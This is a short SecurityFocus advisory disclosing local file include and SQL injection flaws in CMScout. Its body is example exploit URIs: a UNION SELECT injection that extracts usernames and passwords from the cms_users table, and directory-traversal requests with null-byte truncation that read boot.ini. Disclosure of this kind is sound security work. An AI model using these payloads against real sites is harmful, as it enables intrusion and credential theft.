CMScout Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--

http://www.example.com/[path]/admin.php?bit=../../../../../boot.ini%00
http://www.example.com/[path]/index.php?bit=../../../../boot.ini%00


 

Privacy Statement
Copyright 2010, SecurityFocus